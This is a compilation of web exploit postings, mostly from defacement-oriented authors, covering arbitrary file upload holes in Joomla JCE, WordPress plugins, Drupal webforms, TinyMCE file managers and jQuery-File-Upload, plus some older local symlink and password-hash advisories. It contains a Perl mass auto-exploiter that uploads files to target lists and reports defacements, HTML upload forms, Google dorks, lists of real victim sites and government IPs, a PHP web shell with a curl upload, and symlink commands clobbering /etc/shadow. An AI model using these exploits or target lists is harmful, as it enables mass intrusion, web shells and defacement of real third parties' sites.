     promomobiltoyotasidoarjo.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     promomobiltoyotajatim.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     salestoyotagresik.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     saleshondasurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     swalayanrak.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     suzukiwarusurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     suzukiumcsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     suzukisbtsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     suzukisbtmalang.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     suzukimurahsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     suzukimobilsurabaya.net/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     suzukimobilsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     surabayadaihatsu.info/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     surabayadaihatsu.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     umcsuzukipasuruan.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     umcsuzukijatim.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
     Example Mirror [ Proof of Concept ] => zone-h.org/mirror/id/31184406
     #################################################################################
     Discovered By : KingSkrupellos from Cyberizm.Org
     #################################################################################
6. # Exploit Title : Joomla Content Editor JCE Image Manager Auto Mass Exploiter and Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army
# Vendor Homepage : joomlacontenteditor.net
# Software Download Link : joomlacontenteditor.net/downloads / extensions.joomla.org/extension/jce/
# Exploit Risk : High
# CWE-264 - [ Permissions, Privileges, and Access Controls ]
# CXSecurity [ Author : KingSkrupellos ] : cxsecurity.com/ascii/WLB-2018050200
# Cyberizm : cyberizm.org/cyberizm-joomla-content-editor-jce-auto-mass-exploiter.html
#################################################################################
Exploit Title : Joomla Content Editor JCE ImageManager Vulnerability Mass Auto Exploiter
Google Dork [ Example ] => inurl:''/index.php?option=com_jce''
You can search all plugins and themes to find more sites. Most of them have this JCE plugin installed. [ 40 % or more ] Use your brain.
Explanation for Joomla Content Editor JCE => [ ScreenShot ] https://cdn.pbrd.co/images/Hmx6KZC.jpg
JCE makes creating and editing Joomla!® content easy... Add a set of tools to your Joomla!® environment that gives you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS...
Office-like functions and familiar buttons make formatting simple
Upload, rename, delete, cut/copy/paste images and insert them into your articles using an intuitive and familiar interface
Create Links to Categories, Articles, Weblinks and Contacts¹ in your site using a unique and practical Link Browser
Easily tab between WYSIWYG, Code and Preview modes.
Create Tables, edit Styles, format text and more...
Integrated Spellchecking using your browser's Spellchecker
Fine-grained control over the editor layout and features with Editor Profiles
Media Manager => Upload and insert a range of common media files including Adobe® Flash®, Apple Quicktime®, Windows Media Player® and HTML 5 Video and Audio. Easily insert Youtube and Vimeo videos - just paste in the URL and Insert! Insert HTML5 Video and Audio with multiple source options.
Image Manager Extended => Create a thumbnail of any part of an image with the Thumbnail Editor. Insert multiple images. Create responsive images with the srcset attribute. Create image popups in a few clicks - requires JCE MediaBox or compatible Popup Extension.
Filemanager => Create links to images, documents, media and other common file types. Include a file type icon, file size and modified date. Insert as a link or embed the document with an iframe. Create downloadable files using the download attribute.
Template Manager => Insert pre-defined template content from html or text files. Create template snippet files from whole articles or selected content. Configure the Template Manager to set the startup content of new articles.
#################################################################################
Severity: High
[ ScreenShot for JCE Editor ] => https://cdn.pbrd.co/images/HmypA0v.png
This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.
The component is prone to the following security vulnerabilities:
1. A cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input to the 'search' parameter of the 'administrator/index.php' script.
2. A security-bypass vulnerability occurs due to an error in the 'components/com_jce/editor/extensions/browser/file.php' script.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Affected : JCE 2.1.0 is vulnerable; other versions may also be affected.
References => https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27481
References => https://www.securityfocus.com/bid/53630
Note : This Joomla JCE exploit is not the previous exploit going to this path => ..../images/stories/......php => NOT
This JCE is well-known by some hackers, but some hackers do not know anything about this vulnerability. So this is the new one.
TARGETSITE/yourfilename.png .gif .jpg or TARGETSITE/images/yourfilename.html .php .asp .jpg .gif .png
#################################################################################
Notes => Joomla Content Editor JCE Toggle Editor / Image Manager behind the Administration Panel [ ScreenShot ] => https://cdn.pbrd.co/images/Hmx6KZC.jpg
An attacker cannot reach this image manager without a username and password for the control panel. But there is a little trick to upload an image or a file behind this vulnerability. An attacker must execute it with remote file upload code.
Watch Videos from Original Sources =>
Install JCE Editor in Joomla! 2.5 Tutorial [video=youtube]https://www.youtube.com/watch?v=oQdyi_xKJBk[/video]
Joomla 3 Tutorial #7: Using the Joomla Content Editor (JCE) Tutorial [video=youtube]https://www.youtube.com/watch?v=fI0_S-T1gK8[/video]
How to Update / Upgrade a Joomla! Page that uses JCE: the Joomla Content Editor. Fix the Bugs for this Vulnerability [video=youtube]https://www.youtube.com/watch?v=X6h5kcAxvu0[/video]
#################################################################################
You can check with these exploit codes in your browser whether the sites are vulnerable, for testing the security. So you will see some errors.
Exploit => ....../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 {"result":{"error":true,"result":""},"error":null} Exploit => ...../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload or giving this error => {"result":null,"error":"No function call specified!"} Exploit => /component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/ {"result":null,"error":"No function call specified!"} Path => TARGETSİTE/yourfilename.png gif jpg or TARGETSİTE/images/yourfilename.png gif jpg html txt ################################################################################# Auto Mass Exploiter Perl => [code]#!/usr/bin/perl use Term::ANSIColor; use LWP::UserAgent; use HTTP::Request; use HTTP::Request::Common qw(POST); $ua = LWP::UserAgent->new(keep_alive => 1); $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)"); $ua->timeout (10); system('title JCE Mass Auto Exploiter by KingSkrupellos'); print "JCE Mass Auto Exploiter\n"; print "Coded by KingSkrupellos\n"; print "Cyberizm Digital Security Team\n"; print "Sitelerin Listesi Reyis:"; my $list=<STDIN>; chomp($list); open (THETARGET, "<$list") || die ">>>Web sitesi listesi açılamıyor<<< !"; @TARGETS = <THETARGET>; close THETARGET; $link=$#TARGETS + 1; foreach $site(@TARGETS){ chomp $site; if($site !~ /http:\/\//) { $site = "http://$site/"; }; $exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"; print "wait upload $site\n"; $vulnurl=$site.$exploiturl; $res = $ua->get($vulnurl)->content; if ($res =~ m/No function call specified!/i){ open(save, '>>C:\Users\Kullanıcılar\KingSkrupellos\result\list.txt'); print "\n[Uploading]"; my $res = $ua->post($vulnurl, Content_Type => 'form-data', Content => [ 'upload-dir' => './../../', 'upload-overwrite' => 0, 'Filedata' => ["kingskrupellos.png"], 'action' => 
'upload' ] )->decoded_content; if ($res =~ m/"error":false/i){ }else{ print " ......... "; print color('bold white'); print "["; print color('reset'); print color('bold green'); print "PATCHED"; print color('reset'); print color('bold white'); print "] \n"; print color('reset'); } $remote = IO::Socket::INET->new( Proto=> PeerAddr=>"$site", PeerPort=> Timeout=> ); $def= "$site/kingskrupellos.png"; print colored ("[+]Basarili",'white on_red'),"\n"; print "$site/kingskrupellos.png\n"; }else{ print colored (">>Exploit Olmadi<<",'white on_blue'),"\n"; } } sub zonpost{ $req = HTTP::Request->new(GET=>$link); $useragent = LWP::UserAgent->new(); $response = $useragent->request($req); $ar = $response->content; if ($ar =~ /Hacked By KingSkrupellos/){ $dmn= $link; $def="KingSkrupellos"; $zn="http://aljyyosh.org/single.php"; $lwp=LWP::UserAgent->new; $res=$lwp -> post($zn,[ 'defacer' => $def, 'domain1' => $dmn, 'hackmode' => '15', 'reason' => '1', 'Gönder' => 'Send', ]); if ($res->content =~ /color="red">(.*)<\/font><\/li>/) { print colored ("[-]Gönder $1",'white on_green'),"\n"; } else { print colored ("[-]Hata",'black on_white'),"\n"; } }else{ print" Zone Alınmadı !! \n"; } }[/code] How to use this code on your operating system like Windows ; Open Start + Go to Search Button + Type + Command Prompt [ Komut İstemi ] => or cmd.exe Or you can use ConEmulator for Windows => https://conemu.github.io => Download it and use it. 
Create a folder like " jcee " and put your jceexploit.pl and yourimagefile.png ,gif ,png ,html ,txt in it
C:/Users/Your-Computer-Name/
cd Desktop
cd "jcee"
perl yourexploitcodenamejce.pl site.txt
Waiting for Upload Exploit Successful or Not Finished
# Uploaded File/Image Directory Path =>
TARGETDOMAIN/yourfilename.png .jpg .gif
TARGETDOMAIN/images/yourfilename.png .jpg .gif
#################################################################################
Example Vulnerable Sites =>
THE END
#################################################################################
Discovered By KingSkrupellos from Cyberizm Digital Security Team
#################################################################################
7. # Exploit Title : Powered by Quick.Cart & HOST[24] - profi hosting za 24,- Univex.Cz Fckeditor Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Vendor Homepage : opensolution.org ~ univex.cz ~ host24.cz
# Google Dorks : intext:''Copyright © 2008 www.univex.cz'' intext:''Powered by Quick.Cart & HOST[24] - profi hosting za 24,-'' site:cz
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE-264 [ Permissions, Privileges, and Access Controls ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018060297
#################################################################################################
# Exploit : TARGET/fckeditor/editor/filemanager/connectors/uploadtest.html
# Path : TARGET/files/....
#################################################################################################
# Example Vulnerable Sites :
################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
8. # Exploit Title : WordPress Theme Sydney by aThemes 2018 GravityForms Input Remote File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Vendor Homepages : athemes.com/theme/sydney/ ~ gravityforms.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] ~ CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
#################################################################################################
# Google Dork : intext:''Proudly powered by WordPress | Theme: Sydney by aThemes.''
# Exploit HTML Code :
<title>WordPress Theme Sydney by aThemes GravityForms Exploiter</title>
<form action="http://www.TARGETSITE/?gf_page=upload" method="post" enctype="multipart/form-data">
<body background=" ">
<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type=hidden">
<input name="name" value="kingskrupellos.html" type=''hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">
</form>
[img=http://www.imageupload.co.uk/images/2018/06/08/gravityphp5athemes.png]
Exploit : TARGET/?gf_page=upload
We cannot upload directly with this exploit. But we can upload our file to the site with the remote file exploiter.
# Error : {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}
[img=http://www.imageupload.co.uk/images/2018/06/08/miplantest1.png]
# Error [ Successful ] : {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}
[img=http://www.imageupload.co.uk/images/2018/06/08/miplantest2.png]
# Allowed File Extensions : .html .htm .php5 .txt .jpg .gif .png .html.fla .phtml .pdf
# You don't need to rename your file to something like _input__kingskrupellos.php5.
# Just choose a file from your machine and upload it with one of the aforementioned extensions.
# For example : yourfilename.php will be uploaded to the server [ site ] like this : /_input__kingskrupellos.php5
# Example Usage for Windows :
# Use with XAMPP Control Panel and your Localhost.
# Use from the htdocs folder located in XAMPP
# 127.0.0.1/athemeswordpressexploiter.html
# Path : TARGET/_input__kingskrupellos.php5
[img=http://www.imageupload.co.uk/images/2018/06/08/Screenshot_1.png]
#################################################################################################
# Example Site => miplantestclub.com => [ Proof of Concept ] => archive.is/APl6J [ Error ] => archive.is/7G0Jq [ Successful ]
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
9. # Exploit Title : Drupal PaisDigital ArgentinaGov Municipality ContactForm Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 01/06/2018
# Vendor Homepage : argentina.gob.ar/paisdigital
# Tested On : Windows
# Exploit Risk : High
# CWE-264 - [ Permissions, Privileges, and Access Controls ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018060021
#################################################################################################
# Google Dork 1 : inurl:''/?q=contacto'' site:gob.ar
# Google Dork 2 : intext:''Los archivos deben ser menores que 2 MB.'' site:gob.ar
# Google Dork 3 : intext:''Tipos de archivo permitidos: gif jpg jpeg png txt rtf html pdf doc docx odt ppt pptx odp xls xlsx.'' site:gob.ar
# Exploit : /?q=contacto
# Path : /sites/default/files/webform/....
# Notes => Allowed File Extensions : gif jpg jpeg png txt rtf html pdf doc docx odt ppt pptx odp xls xlsx.
#################################################################################################
# Target IP Address => 186.33.254.182
# Example Vulnerable Sites => [ Proof of Concept ] => archive.is/d8GHu => archive.is/QTpnS
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
10. # Exploit Title : Drupal 7 jQuery ItalianGov Fi.it Scrivi Al Comune Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 22/06/2018
# Vendor Homepage : regione.toscana.it - jquery.com
# Tested On : Windows
# Version : 7
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-287 [ Improper Authentication ] + CWE-284 [ Improper Access Control ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018060240
#################################################################################################
# Google Dorks : intext:''Scrivi al Comune'' site:fi.it
Il testo del tuo messaggio * site:fi.it
# Exploits : /scrivi-al-comune /scrivi-al-comune-0 /segnalazioni-e-reclami-0 /scrivi-al-sindaco-0 /node/19
# Path : /sites/www.comune.DOMAINADDRESS.fi.it/files/webform/.....
# Note => Allowed File Extensions : gif jpg png tif txt rtf odf pdf doc docx xls xlsx.
# Don't forget to put www. before comune. in the URL address bar.
#################################################################################################
# Example Vulnerable Sites and Target IP => 159.213.236.225
[ Proof of Concept for Vulnerability and Exploit ] => archive.is/zUN5z - archive.is/3IMxH
################################################################################################
Reference Topic Link [ It belongs to me ] => cyberizm.org/cyberizm-drupal-7-jquery-italia-fi-it-scrivi-al-comune-exploit.html
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
11. #################################################################################################
# Exploit Title : WordPress DrcSystems EthicSolutions Jssor-Slider Library Plugin Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/06/2018
# Vendor Homepage : jssor.com - drcsystems.com - ethicsolutions.com - wordpress.org/plugins/jssor-slider/
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-284 [ Improper Access Control ] - CWE-862 [ Missing Authorization ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018060226
#####################################################################################################
Description : "Jssor Slider by jssor.com" is open source software. Jssor Slider is a professional, light weight and easy to use slideshow/slider/gallery/carousel/banner; it is optimized for mobile devices with tons of unique features.
# Key Features : Touch Swipe - 200+ Slideshow Transitions - Layer Animation - Fast Loading, load slider html code from disk cache directly - High Performance Light Weight - Easy to Use - Repeated Layer Animation - Image Layer - Text/Html Layer - Panel Layer - Nested Layer - Layer Blending - Clip Mask Multiplex Transition - z-index Animation - Timeline Break - Dozens of bullet/arrow/thumbnail skins
#####################################################################################################
Affected Jssor Slider Plugin Code :
When the plugin is active, the function register_ajax_calls() in the file /lib/jssor-slider-class.php is run. That gives anyone access to two AJAX functions that are only intended to be accessible to those logged in as Administrators. The upload_library() function accessible through that handles uploading a file through /lib/upload.php. That file also doesn't do any checks as to who is making the request and does not restrict what type of files can be uploaded.
It is also possible to exploit this by sending a request directly to the file /lib/upload.php, as long as the undefined constant in it isn't treated as an error.
The following proof of concept will upload the selected file to the directory /wp-content/jssor-slider/jssor-uploads/. Make sure to replace "[path to WordPress]" with the location of WordPress.
public function register_ajax_calls() {
    if ( isset( $_REQUEST['action'] ) ) {
        switch ( $_REQUEST['action'] ) {
            case 'add_new_slider_library' :
                add_action( 'admin_init', 'jssor_slider_library' );
                function jssor_slider_library() {
                    include_once JSSOR_SLIDER_PATH . '/lib/add-new-slider-class.php';
                }
                break;
            case 'upload_library' :
                add_action( 'admin_init', 'upload_library' );
                function upload_library() {
                    include_once JSSOR_SLIDER_PATH . '/lib/upload.php';
                }
                break;
        }
    }
}
#####################################################################################################
# Google Dorks :
inurl:''/wp-content/jssor-slider/jssor-uploads/''
intext:''Managed by Web development company Ethic Solutions''
intext:''Todos los derechos reservados © Ecuaauto - Distribuidor autorizado Chevrolet Ecuador''
intext:''Website Developed by DRC Systems''
#####################################################################################################
# PoC : /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
# Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
# Exploit Code :
<html>
<body>
<form action="http://[PATH]/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data" >
<input type="file" name="file" />
<input type="submit" value="Submit" />
</form>
</body>
</html
# Uploaded File Path : /wp-content/jssor-slider/jssor-uploads/.....
# Allowed File Extensions : With the exception of php and asp [ Not Allowed ], all other file extensions are allowed. For example html and txt, etc.
# Usage : Use with XAMPP Control Panel and with your Localhost [ 127.0.0.1 ]
localhost/jssorsliderexploiter.html
#################################################################################################
# Example All Vulnerable Sites =>
############################################################################
Reference [ Me ] : cyberizm.org/cyberizm-wordpress-drcsystems-ethicsolutions-jssorslider-exploit.html
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
12. ***************************************************
# Exploit Title: Đăng nhập Arbitrary File Upload
# Google Dork: intext:Đăng nhập. Xác nhận. inurl:/xadmin
# Exploit: /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php
# Date: 12/10/2018
# Author: 0N3R1D3R
# Team: Indonesia To World Team
# Tested on: Windows 10 x64
***************************************************
[+] Search the dork in Google
[+] Exploit the site with /editor/fileman/aklsdjfklsdjflksdkl.html
[+] Upload your backdoor with bypass ext
***************************************************
[+] Demo Site
[+] https://thietbibepkanzler.vn/editor/fileman/aklsdjfklsdjflksdkl.html
[+] http://kientrucla.com/editor/fileman/aklsdjfklsdjflksdkl.html
[+] https://www.songhonghanoi.com/editor/fileman/aklsdjfklsdjflksdkl.html
***************************************************
Thanks To Indonesia To World Team
  13. Title: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability Author: Larry W. Cashdollar, @_larry0 Date: 2018-10-09 CVE-ID:[CVE-none] Download Site: https://github.com/blueimp/jQuery-File-Upload/releases Vendor: https://github.com/blueimp Vendor Notified: 2018-10-09 Vendor Contact: Advisory: http://www.vapidlabs.com/advisory.php?v=204 Description: File Upload widget with multiple file selection, drag&drop support, progress bar, validation and preview images, audio and video for jQuery. Supports cross-domain, chunked and resumable file uploads. Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads. Vulnerability: The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php doesn't require any validation to upload files to the server. It also doesn't exclude file types. This allows for remote code execution. This has been actively exploited in the wild for over a year. Exploit Code: $ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php Where shell.php is: <?php $cmd=$_GET['cmd']; system($cmd);?>
  14. *************************************************** # Exploit Title: Dipnot Yönetim Paneli Arbitrary File Upload # Google Dork: inurl:/dipnotpanel/js/tinymce/plugins/fileman # Exploit: /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php # Date: 03/10/2018 # Author: 0N3R1D3R # Team: Indonesia To World Team # Tested on: Windows 10 x64 *************************************************** [+] Search the dork in Google [+] Exploit the site with /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php [+] Upload your file with csrf, post file files[] [+] Upload shell must with bypass ext [+] Access the site with /dipnotpanel/js/tinymce/plugins/fileman/Uploads/file.jpg *************************************************** [+] Demo Site [+] http://www.mikronmadencilik.com/dipnotpanel/js/tinymce/plugins/fileman/php/upload.php [+] http://www.arinna.com.tr/dipnotpanel/js/tinymce/plugins/fileman/php/upload.php [+] http://www.aegee-eskisehir.org/dipnotpanel/js/tinymce/plugins/fileman/php/upload.php *************************************************** Thanks To Indonesia To World Team
  15. Title: IBM Informix File Clobbering during Install Author: Larry W. Cashdollar, @_larry0 Date: 2006-10-01 CVE-ID:[CVE-2006-5163] Download Site: http://www14.software.ibm.com/webapp/download/preconfig.jsp?id=2013-03-26+02%3A55%3A11.385011R&S_TACT=&S_CMP= Vendor: IBM Vendor Notified: 2006-10-01 Vendor Contact: Advisory: http://www.vapid.dhs.org/advisories/ibm_informix_dynamic_server_file_clobbber_during_install.html Description: IBM Informix Dynamic Server (IDS) is a strategic data server in the IBM Information Management Software portfolio that provides blazing online transaction processing (OLTP) performance, legendary reliability, and nearly hands-free administration to businesses of all sizes. IDS 10 offers significant improvements in performance, availability, security, and manageability over previous versions, including patent-pending technology that virtually eliminates downtime and automates many of the tasks associated with deploying mission-critical enterprise systems. Vulnerability: During installation the installserver script creates a file in /tmp called installserver.txt; an unprivileged user can symlink this file to another file, causing the target file to have the contents of installserver.txt appended to it. vapid:/tmp# ls -l /tmp/installserver.txt lrwxrwxrwx 1 lwc lwc 11 Oct 1 18:27 /tmp/installserver.txt -> /etc/passwd After installation the contents of installserver.txt was appended to /etc/passwd. The default file permissions of the installation package are too open; an unprivileged user can take advantage of an installation by a privileged user by injecting code into the installer script. 
nobody@vapid:/home/auditor/test$ ls -l total 273168 -rw-rw-rw- 1 root root 10328050 Aug 1 2005 Gls.rpm -rw-rw-rw- 1 32100 1360 5125418 Aug 1 2005 IIF.jar -rw-rw-rw- 1 root root 84374286 Aug 1 2005 IIFServer.rpm -rw-rw-rw- 1 root root 786557 Aug 1 2005 Message.rpm drwxrwxrwx 2 32100 1360 4096 Aug 1 2005 doc -rw-r--r-- 1 auditor auditor 140032000 Oct 1 18:21 iif.10.00.UC3R1TL.Linux.tar -rwxr-xr-x 1 32100 1360 4424 Aug 1 2005 install_rpm -rwxrwxrwx 1 32100 1360 38727685 Oct 1 18:46 installserver -rwxr-xr-x 1 32100 1360 5069 Aug 1 2005 server.ini
  16. Title: PatchLink Update Unix Client File clobbering vulnerability Author: Larry W. Cashdollar, @_larry0 Date: 2008-01-17 CVE-ID:[CVE-2008-0525] Download Site: http://lumension.com/patch-management.jsp?rpLangCode=1&rpMenuId=118443 Vendor: http://lumension.com Vendor Notified: 2008-01-17 Vendor Contact: bugtraq Advisory: http://www.vapid.dhs.org/advisories/patchlink_update_unix_client_file_clobber_vulnerability.html Description: PatchLink Update™ provides rapid, accurate and secure patch management, allowing you to proactively manage threats by automating the collection, analysis and delivery of patches throughout your enterprise. PatchLink Update significantly decreases the costs involved in securing your organization from worms, Trojans, viruses and other malicious threats. Vulnerability: The log rotation utility "logtrimmer" utilizes space in /tmp improperly and is subject to a symlink attack. By creating a targeted symlink a non-root user can clobber root-owned files, causing DoS. Exploit Code: nobody:/tmp> ln -s /etc/shadow patchlink.tmp After logs are rotated /etc/shadow will be size 0, since patchlink.tmp is removed by logtrimmer after the log rotation process has finished.
  17. Title: Borland's InterBase 7.1 poor Password Data File Permissions and Password Hash Author: Larry W. Cashdollar, @_larry0 Date: 2003-11-26 CVE-ID:[CVE-2004-1833] Download Site: http://www.borland.com/interbase Vendor: Borland Vendor Notified: 2003-11-26 Vendor Contact: disclosed via idefense Advisory: http://www.vapid.dhs.org/advisories/borland_interbase_db_vulnerablities.html Description: Borland InterBase raises the bar for performance and power in small footprint databases. Designed for use in situations where there is no database administrator or IT support, InterBase is powerful enough to support mission-critical applications, yet compact enough to run on very modest systems. It can be easily transported by disk, CD, or even dial-up download. And unlike enterprise databases that require expensive ecosystems of support and maintenance, InterBase requires virtually no maintenance. Vulnerability: The "information database" stored in the file admin4.pcb is readable and writeable for all users with local access to the system. [root@Fester interbase]# ls -l /opt/interbase/admin.ib -rw-rw-rw- 1 root root 616497 Nov 20 10:04 /opt/interbase/admin.ib Not only is the password file stored readable and writeable by all local users, but the password hash is done with one salt "9z" and then hashed again. As an addition to the permissions issue, I thought I should flesh out the fact that the double crypt() does not add any security to the hash without the salt. The purpose of the salt is so that the same passwords don't always have the same hashes. With them removing the salt, the hashes will always be the same for the same password regardless of crypt() being called twice. This can be expressed in this line of pseudo C: crypt(&crypt(user_password,"9z")[2],"9z") Exploit Code: Local attackers can exploit this vulnerability to add or modify accounts in Interbase. The following C program will generate hashed passwords that can be injected into the admin.ib database.

```c
/* Larry W. Cashdollar, Vapid Labs. Borland Interbase 7.1 password creator. lwc@vapid.dhs.org */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <crypt.h>   /* crypt() prototype; link with -lcrypt */

#define SALT "9z"

int main(int argc, char *argv[])
{
    char first[32], *crypt1, *crypt2;   /* crypt() returns a char *, not a char */

    if (argc < 2) {
        printf("Borland InterBase db password tool.\n Larry Cashdollar, vapid labs\nEnter desired password as an argument\n");
        exit(1);
    }
    /* First pass: DES crypt() of the password with the static salt "9z" */
    crypt1 = crypt(argv[1], SALT);
    if (crypt1 == NULL) { perror("crypt"); return 1; }
    /* crypt() reuses one static buffer, so keep a copy before calling it again */
    snprintf(first, sizeof first, "%s", crypt1);
    /* Second pass: hash the first result minus its two salt characters, same static salt */
    crypt2 = crypt(&first[2], SALT);
    if (crypt2 == NULL) { perror("crypt"); return 1; }
    printf("Double crypt() is: %s\n", crypt2);
    printf("Without salt (as stored in isc4.gdb/admin.ib): %s\n", &crypt2[2]);
    return 0;
}
```
  18. Title: PrimeBase Database Poor File Permissions and Crypt() Hash Author: Larry W. Cashdollar, @_larry0 Date: 2003-10-20 CVE-ID: Download Site: http://www.firebirdsql.org http://www.ibphoenix.com Vendor: Primebase SQL Vendor Notified: 2003-10-20 Vendor Contact: http://www.primebase.de/index.html Advisory: http://www.vapid.dhs.org/advisories/primebase_sql_database_stored_cleartext_password.html Description: "The Firebird(tm) database engine is derived from the InterBase(r) product currently owned by Borland. The documentation for InterBase v 6.0 applies also to the current FireBird release. InterBase documentation is available in Adobe Acrobat format from http://info.borland.com/techpubs/interbase/." The "information database" stored in the file isc4.gdb is readable and writeable for all users with the default rpm installation of Firebird-1.0.3 for Linux. Vulnerability: [root@Fester interbase]# ls -l /opt/interbase/isc4.gdb -rw-rw-rw- 1 root root 618497 Jun 8 14:44 /opt/interbase/isc4.gdb This file contains the password hashes and usernames for the firebird database. The passwords are hashed twice, once with the static salt "9z" and a second time with the returned crypt text minus the salt. crypt(&crypt(user_password,"9z")[2],"9z") The PrimeBase SQL Database Server 4.2 stores passwords in clear text, and based on the installing user's umask settings they may be readable by all local users. From the readme.txt file: "The Admin server will require you to enter your password in a text file called 'password.adm' (in the server folder), before you can continue. NOTE: This is the password for access to the Admin Server only." Depending on your umask settings (default 022 for root) the "Admin Server" password may be readable by local users. Also the password is not stored as a hash or encrypted. A malicious user could use this password to access the web based administration server and compromise the system. 
The database also comes with a default "Administrator" account with no password; the documentation does recommend the installer set the Administrator password during installation. Recommendations: Store the password as a hash in a file read-only by the Admin Server. Disable the Administrator account until a password has been set for it. This is still a problem for the symlink attack during installation for the primebase products. See previous link above for more detail. They just changed the format of the filename to something just as trivial as a static filename. Not going to bother reporting or posting this. LOG="/tmp/PrimeBase_"`date '+%y%m%d%H%M'`".log" Just as easy to ln -s /tmp/PrimeBase_$date.log to /etc/shadow.
  19. ################################################################################################# # Exploit Title : Joomla Com_BibleStudy Proclaim MediaFileForm Remote File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 28/09/2018 # Vendor Homepage : joomlabiblestudy.org ~ extensions.joomla.org/extension/proclaim/ # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CVE: CVE-2018-7316 # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] ################################################################################################# # Google Dork : inurl:''/index.php?option=com_biblestudy'' # Exploit : TARGET/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 # Note : Go to the '' Media Files '' Category. Choose your File and Upload it. # Directory File Path : TARGET/images/biblestudy/media/.... ################################################################################################# # Example Vulnerable Sites => kalamekhuda.com/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 => [ Proof of Concept for Vulnerability and Proof of Mirror ] => archive.is/nfskL => archive.is/5NaKe hereatcalvary.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 [ Proof of Concept ] => archive.is/oEPx3 cclivinghope.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
